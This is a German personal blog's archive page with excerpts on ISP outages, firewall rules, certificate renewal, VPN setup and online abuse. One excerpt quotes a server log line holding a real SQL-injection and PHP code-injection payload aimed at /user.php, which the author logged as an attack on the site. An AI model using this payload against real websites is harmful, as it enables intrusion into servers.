Froschs Blog

Computer und was das Leben sonst noch so zu bieten hat

Zur Website | Impressum

Archiv der Rubrik 'Internet'

Drei Wahrheiten, eine Lüge

Mittwoch, 27. Oktober 2021

… ist ein „Spiel“, das derzeit auf Twitter umgeht. Und weil ich grade Abwechslung brauchen konnte, habe ich mich gestern mal daran beteiligt.

Das Spiel geht so: Man postet vier Behauptungen über sich selbst. Drei davon sind wahr, eine ist falsch. Und die Followerschaft darf raten, welche der Behauptungen die falsche, also die Lüge ist.

Meine Behauptungen waren: (mehr …)


IP-Jonglieren mit Vodafone

Dienstag, 8. Juni 2021

Als ich letzten Monat, um meine Kosten zu reduzieren, einen neuen Internet-Tarif bei Vodafone buchte, hatte ich eigentlich überlegt, wieder in den Privatkundenbereich zurückzuwechseln, weil ich davon ausging, daß es dort günstiger ist als im Business-Bereich. Den Business-Tarif hatte ich ja nur, weil UnityMedia vor ihrem Verkauf an Vodafone – und als dieser noch nicht öffentlich bekannt war – die Business-Verträge angeboten hatte wie sauer Bier. Es ist zu vermuten, daß sie mit der deutlichen Erhöhung der Business-Verträge ihren Marktwert steigern wollten.

Allerdings war dieser BusinessVertrag nur in den ersten 24 Monaten günstig (rund 40,00 € im Monat), danach ging er auf über 70,00 € im Monat hoch, das war mir denn doch zu viel.

Vodafone lockte mich jedoch mit einem neuen Business-Vertrag, der zwar mehr kostet als die vorherigen 40, aber immerhin günstiger ist als die 70. Ich sollte statt der bisherigen 200 mBit/s Download und rund 20 mBit/s Upload 500 und 50 mBit/s bekommen, und außerdem eine feste IP-Adresse. Letzteres reizte mich sogar mehr als die Geschwindigkeit, denn damit kann ich zum Beispiel den Zugang zu den ssh-Ports auf den Servern auf diese Adresse festnageln und Angreifer, auch die Such-Bots, die regelmäßig die Ports abklappern, finden dann diesen Port nicht mehr. Die vorherige Geschwindigkeit hatte mir eigentlich vollkommen ausgereicht.

Nach der Tarifumstellung hatte ich dieselbe IPv4-Adresse wie vorher, in der IP-Range 84.119.0.0/16. Daher ging ich davon aus, daß sie diese letzte dynamisch zugeteilte IP einfach auf meinen Anschluß festgenagelt hatten und fand das äußerst praktisch. Ich paßte meine iptables-Regeln auf den Servern an und glaubte, daß ich daran nun nichts mehr verändern muß. Ich sollte mich irren. (mehr …)


Parteitag mal anders

Montag, 10. Mai 2021

An diesem Wochenende fand der erste Teil des ersten hybriden Bundesparteitags der Piratenpartei Deutschland statt. Eine gute Gelegenheit für mich, endlich mal wieder an einem Bundesparteitag teilzunehmen, ohne mit Reisekosten und -organisation belastet zu sein. Und ohne das Risiko, dann in einem Plenum zu sitzen, in dem um mich herum ständig geredet wird, so daß ich den zweiten Tag verliere, weil ich in der Nacht nach dem ersten zusammenbreche.

Dafür, daß es der erste so veranstaltete Bundesparteitag seiner Art ist, sieht das alles schon sehr gut aus. Natürlich lief noch nicht alles glatt. Zum Beispiel war da das ungültige Zertifikat des Mumble, in welches man anfangs reinmußte, um sich zu akkreditieren. Oder die eingeschränkten Netzkapazitäten vor Ort, die dem Jitsi (für öffentliche Wortmeldungen, Fragen, Reden, Vorstellungen etc.) offenbar gelegentlich Probleme bereiteten. (mehr …)


Angriffsversuch per Referer

Sonntag, 2. Mai 2021

Eben in einer Meldung von fail2ban gesehen:

114.219.10.161 - - [02/May/2021:08:02:47 +0200] "POST /user.php HTTP/1.1" 404 47 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\x22num\x22;s:191:\x22*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7B24617364275D3B6576616C2F2A2A2F286261736536345F6465636F646528275A585A686243676B583142505531526259575274615735644B54733D2729293B2F2F7D787878,0--\x22;s:2:\x22id\x22;s:9:\x22' union/*\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Ohne Recherche: Das sieht erstmal … seltsam aus. Vermutlich müßte man die Hex-Zahlenreihen aufdröseln, um zu erfahren, was er wirklich wollte. Die lesbaren Strings „select“ und „union“ deuten aber auf einen SQL-Angriff hin. Nur: Warum steht der im Referer? Was würde denn darauf anspringen? (mehr …)


Wenn Let’s Encrypt nicht erneuern will …

Freitag, 23. April 2021

Ich habe das jetzt schon ein paarmal beobachtet: Let's Encrypt, hier „vertreten“ durch den Certbot, meldet immer mal wieder für die eine oder andere (Sub-)Domain, daß eine Erneuerung des Zertifikats nicht möglich sei, weil die Bots, die die Challenge überprüfen, in einen Timeout gelaufen seien. Die Standard-Vermutung ist, sie seien in die Firewall geraten. Das passierte bisher sowohl hier auf meinem eigenen Server als auch auf dem Server eines Vereins, den ich administriere.

Und jedesmal überprüfte ich die vier IP-Adressen, mit denen Let's Encrypt zugreifen wollte, und sie standen natürlich nicht in der Firewall. fail2ban wußte jeweils auch nix davon.

Das Problem löst sich manchmal von selbst, indem Let's Encrypt dann doch irgendwann nach Tagen oder Wochen die Erneuerung durchführt, als wäre nichts gewesen. Aber manchmal will es gar nicht funktionieren, dann muß man etwas nachhelfen – so wie ich heute bei einer Subdomain, bei der sich der Certbot bereits seit 40 Tagen vergeblich um eine Erneuerung bemühte.

Die Lösung ist … unkonventionell und vom Typ „muß ich nicht verstehen, oder?“. So geht's: (mehr …)


Jahresrückblick 2020

Donnerstag, 31. Dezember 2020

In einem Wort: UFF.

OK, ich mach das ja üblicherweise etwas ausführlicher 😁, so here we go:

2020 fing erstmal so an, wie 2019 aufgehört hatte: Mit viel „geht nicht“ AKA exekutiver Dysfunktion.

Ende Januar entdeckte ich die App TooGoodToGo. Obwohl ich gehofft hatte, darüber vor allem Obst und Gemüse günstig zu bekommen, blieb es in den ersten knapp drei Monaten zunächst bei Backwaren; Obst und Gemüse wurde nur wenig angeboten und war dann schneller ausverkauft, als ich am Smartphone wischen und klicken konnte. Damit änderten sich meine Frühstücks-Gewohnheiten: Statt Müsli habe ich nun meistens (aufgebackene) Brötchen oder Brot. Und damit konnte ich auch endlich die von meiner Mutter geerbten Marmeladen und Gelees verwerten, die in der Küche ein ganzes Regal belegten. (mehr …)


Fehlerbehebung à la Vodafone (2)

Donnerstag, 3. Dezember 2020

Mein Zugang ist weiterhin stabil, und das sollte jetzt laut Vodafone-Techniker auch so bleiben.

schrieb ich am 30. November. Well. Es blieb nicht so. Und ich lernte, daß interne wie externe Kommunikation für Vodafone (so als Telekommunikationsunternehmen) offenbar ein Fremdwort ist. Das Drama ging also weiter:

01.12.2020 ca. 12:30 Uhr: Ich schalte den PC ein, schau gleich mal zum Router rüber (den ich im Sichtbereich, aber nicht im direkten Sichtfeld stehen habe) und sehe: Da blinkt was. Kurz drauf geht auch die rote Lampe an, was, wie ich in den letzten Tagen gelernt habe, das Signal dafür ist, daß die Verbindung seit mehr als einer Stunde weg ist. Also das Ganze nochmal von vorne … (mehr …)


Fehlerbehebung à la Vodafone

Montag, 30. November 2020

28.11.2020, ca. 23:40 Uhr: Ich schalte den PC aus, alles normal.

29.11.2020, 11:30 Uhr: Ich schalte den PC ein, Thunderbird sagt mir, er kann die Mailserver nicht erreichen. ping auf meinen Server: nix. ping auf Router: Anwesend. Aber die rote Lampe am Router ist an, und eine grüne Lampe, die eigentlich dauerhaft an sein sollte, blinkt. Ich kontaktiere @vodafoneservice auf Twitter, die schreiben mir – nach einer zweiten öffentlichen Beschwerde einige Stunden später – per DM, daß ich eine 0800-Nummer für Business-Kunden anrufen soll, weil sie selbst nur für private Kunden zuständig sind.

ca. 15:30 Uhr: Ich versuche, diese Nummer über Festnetz anzurufen, bekomme aber nur besetzt. Ich rufe anschließend die Nummer mit einem Mobiltelefon an, 10 Minuten Warteschleife, dann heißt es, am Folgetag werde sich ein Techniker einer externer Firma bei mir melden für einen Termin. (mehr …)


Spaß mit iptables

Donnerstag, 10. September 2020

Mit iptables kann man auf einem Linux-System festlegen, welche IP bzw. welche IP-Bereiche auf welche Ports bzw. überhaupt auf einen Host zugreifen dürfen. Nun hatte ich vor einiger Zeit festgestellt, daß es sozusagen Port-Sucher gibt, die – schön langsam, damit sie unterm Radar bleiben – nach und nach alles an denkbaren Ports an einem Host abklappern, um zu gucken, ob da vielleicht ein sshd läuft. Denn mittlerweile legt man den sshd nicht auf den üblichen Port 22, sondern auf einen anderen, meist einen so genannten hohen Port (> 1024).

Wenn diese Port-Sucher fündig werden, schicken sie eine ganze Ladung anderer Hosts los, um diesen sshd zu, ähm, belästigen. Das fand ich etwas störend, also wollte ich etwas dagegen unternehmen.

Zu diesem Zweck definierte ich eine Regel, die den Zugang auf den Port des sshd auf ein paar wenige IP-Adressen einschränkt. Auf diesen Server hier kommen seitdem nur noch die Hosts, auf denen ich selbst wiederum einen Shell-Zugang habe, und eben die IP, die mir mein ISP hier zu Hause zugewiesen hat. Praktischerweise schien die letztgenannte IP quasi-fest zu sein; ich meine, die hat sich seit zwei Jahren oder so nicht mehr geändert.

Von Montag auf Dienstag änderte sie sich nun doch. Und damit fing der Spaß an. (mehr …)


Joe Job via Piwigo-Plugin?

Donnerstag, 14. Mai 2020

Es gibt Netzmißbrauch-Varianten, die muß man echt nicht verstehen. Seit etwa zwei Wochen beobachte ich mindestens 40 Einträge pro Tag auf meiner Piwigo-Instanz über das Plugin Subscribe-to-Comments. Das hat dieselbe Funktion wie das gleichnamige Plugin für WordPress/ClassicPress, mit dem Unterschied, daß es nicht konfigurierbar ist: Man kann sich damit von der Site Mails schicken lassen, wenn zu einem bestimmten Beitrag bzw. Foto ein neuer Kommentar eingegangen ist – auch wenn man selbst nicht kommentiert hat.

Das betreffende Foto – und ja, es war immer dasselbe – hat bisher keine Kommentare bekommen und zeigt auch generell nichts Besonderes. Die verwendeten Mailadressen stammen offensichtlich von amerikanischen Mailhostern. Eingeliefert werden die Subscriptions, soweit ich das gesehen habe, ausschließlich über Tor-Exit-Nodes. Die Mailadressen, die dabei angegeben werden, existieren teilweise nicht einmal; ich hatte deshalb pro Tag etliche Bounces. Heute wurde mir dann klar, daß auch die Inhaber der existierenden Adressen nichts davon wußten: Ich bekam nämlich eine Spam-Beschwerde. (mehr …)


OpenVPN Server auf Port 443 für Android-Client

Dienstag, 10. März 2020

Ich bekam vorgestern aus meinem Umfeld die Bitte, einen OpenVPN-Zugang auf Port 443 für ein Android-Smartphone zur Verfügung zu stellen. 443 ist ja eigentlich der Port, der für https vorgesehen ist, der verschlüsselten Übertragung von Webseiten; für OpenVPN ist Port 1194 üblich. Das ist, wie in diesem Fall, sinnvoll, wenn man nur einen stark eingeschränkten Internet-Zugang zur Verfügung hat, bei dem nur die Standard-Ports für WWW und E-Mail zugänglich und alle anderen gesperrt sind. Außerdem sind wohl auch bestimmte IP-Ranges gesperrt. Nein, nicht Iran oder China. Ein Patienten-WLAN in einem deutschen Krankenhaus.

Auf meinem Hauptserver habe ich zwar einen OpenVPN-Server laufen, aber natürlich auf einem anderen Port, denn 443 ist hier für den Webserver reserviert. Allerdings habe ich ja vor gut zwei Monaten für ein Projekt zusätzlich einen kleinen V-Server angemietet, und auf dem läuft kein Webserver. Also habe ich da vorgestern mal ein neues OpenVPN draufgebaut, dem Nutzer die nötigen Dateien incl. Client-Konfiguration gemailt und – es funktionierte nicht. „TLS handshake failed“, sagte der Client. (mehr …)


gitweb und die robots.txt

Donnerstag, 5. März 2020

In den letzten paar Monaten fiel mir auf, daß unterschiedlichste Hosts ziemlich fleißig meine Gitweb-Site crawlten, und zwar allesamt mit der Crawler-Kennung „MJ12Bot“. Dieser Crawler wird tatsächlich dezentral betrieben, das heißt, wer mag, kann sich das Ding auf seinem Host installieren und ihn dann fleißig laufen lassen. Gemeldet werden die Daten dann wohl an eine zentrale Datenbank.

Weil ich das nicht wollte, hatte ich den MJ12Bot in die robots.txt für die Gitweb-Site eingetragen. Den MJ12Bot schien das nicht weiter zu stören. Ich nahm ihn dann vor einiger Zeit in den badbots-Filter von fail2ban auf, weil ich ihn offenbar nicht anders loswerden konnte.

Heute stellte ich dann „endlich“ fest, daß ich hier mal wieder ein PEBCAK produziert hatte … (mehr …)


#TwitterSperrt

Dienstag, 4. Februar 2020

Twitter sperrt offenbar immer mal wieder Accounts von Menschen, die sich gegen Rassismus, Sexismus, Ableismus und andere -ismen wehren. Allerdings ist nicht so ganz klar, nach welchen Kriterien; ich habe mehrfach beobachtet, daß nach solchen Sperrungen andere aus Solidarität denselben Wortlaut twitterten und nicht gesperrt wurden.

Daher wollte ich das jetzt mal selbst ausprobieren. Gesperrt wurde @nhile_de wegen folgendem Tweet:

Alle, die Witze über Asiat*innen und Coronavirus machen, bekommen eine Schelle. Don't even try to wrap your racism into a joke.

Daraufhin bekam Nhi eine 12stündige Sperre mit der Begründung: „Du darfst Dich nicht an der zielgerichteten Belästigung von Nutzern beteiligen oder andere dazu ermutigen. Darunter fällt auch, jemandem anderen körperlichen Schaden zu wünschen oder Hoffnungen in dieser Richtung zu äußern.“

[03.02.2020] Bereits in den Vormittagsstunden des 3. Februar bekam ich mit, daß auf verschiedenen Accounts die Aussage von Nhi aus Solidarität wortwörtlich wiederholt wurde.

Und jetzt wollte ich es wissen: Ich habe den Tweet von Nhi wortwörtlich wiederholt und nur den Hashtag #UnbanNhi angehängt: (mehr …)


Trojaner-Versand nach geknacktem Account

Montag, 16. September 2019

Richtig gelesen: „nach“, nicht „mit“.

Ich bekam heute Vormittag eine E-Mail, die scheinbar von einer Firma kam, mit der ich bis vor ein paar Monaten gelegentlich in Kontakt stand. Scheinbar, weil die Absender-Adresse nicht dazu paßte. Die Firma hat eine eigene Domain mitsamt MX, verschickt also normalerweise auch E-Mails unter dieser eigenen Domain. Aber die Absender-Adresse dieser E-Mail war eine völlig andere.

In dieser E-Mail wurde eine E-Mail von mir an die Firma zitiert, ein typischer Vollquote, darüber stand ohne Anrede „wie besprochen, in der Anlage die angeforderte [sic!] Informationen.“ Allerdings hatte ich diese E-Mail bereits Mitte Januar geschrieben gehabt; es war die letzte Mail, die ich dorthin geschickt hatte (und die war damals auch beantwortet worden). (mehr …)


Tschö WordPress, hallo ClassicPress!

Montag, 29. Juli 2019

Seit letztem Jahr schon geplant, endlich habe ich es geschafft: Den Wechsel von WordPress zum Fork ClassicPress. Schon vor längerer Zeit hatte ich einen Anlauf genommen und versucht, ein nicht mehr aktiv genutztes Blog testweise umzustellen, bevor ich an dieses hier gehe. Es funktionierte damals aber nicht; die Umstellung blieb mit einer Fehlermeldung quasi mittendrin hängen. Daher nahm ich erstmal davon Abstand, zu versuchen, auch dieses Blog umzustellen.

Der Wechsel wird durch ein Plugin bewerkstelligt, und dieses lag damals in einer Version 0.5 oder so vor. Entwickler behaupteten in ihrem Forum, der Fehler, der bei mir auftrat, sei weder bekannt noch nachvollziehbar. Also so ein Fall von „das passiert mal wieder nur mir“. (mehr …)